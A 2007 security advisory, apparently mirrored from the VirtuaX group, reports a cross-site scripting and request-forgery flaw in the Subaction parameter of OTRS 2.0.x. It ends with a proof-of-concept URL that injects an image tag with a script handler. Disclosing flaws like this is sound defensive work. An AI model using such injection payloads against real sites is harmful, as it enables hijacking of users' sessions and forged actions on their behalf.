OTRS <= 2.0.x XSS/XSRF

2007-05-0800:00:00

vulners.com

614

JSON

| ____ . __ |
| \ \ / /|__|/ | __ _______ ___ |
| \ Y / | \ __ \ \ | \ \ \ \/ / |
| \ / | || | \/| | | | // __ \> < |
| \/ |||| || |/( /_/\_ \ |
| \/ \/ |
| Security without illusions |
| www.virtuax.be |

                      Application: OTRS
              Vulnerable Versions: &lt;= v2.0.x
                    Vulnerability: XSS/XSRF

                           Vendor: http://www.otrs.org
                    Vendor Status: Notified

                            Found: 07-05-2007
              Public Release Date: 07-05-2007
                    Last modified: 07-05-2007
                           Author: ciri
                           E-mail: ciri[a.t]virtuax[d.o.t]be
     
   reference: http://www.virtuax.be/advisories/Advisory5-07052007.txt

=================================================================================

Shouts to the VirtuaX Crew & Community!

=================================================================================

I. Background

"OTRS is an Open source Ticket Request System with many features to manage customer
telephone calls and e-mails. The system is built to allow your support, sales,
pre-sales, billing, internal IT, helpdesk, etc. department to react quickly to
inbound inquiries"
by otrs.org

II. Vulnerablity

OTRS is vulnerable to a XSS/XSRF. It is possible to inject code into the
Subaction parameter. Authentication is required to reach the page, but a
non-authenticated user will be asked to login and the attack will still be carried
out. XSRF is ofcourse also possible in this case.

IIa. Affected Versions

OTRS 2.0.4 was tested and appears to be vulnerable. I've tested version 2.2.0 and
it doesn't seem to be vulnerable anymore.

III. PoC

http://server/otrs/index.pl?Action=AgentTicketMailbox&Subaction=<img src=
https://server/otrs/images/Standard/new-message.png onLoad=javascript:alert('hello');>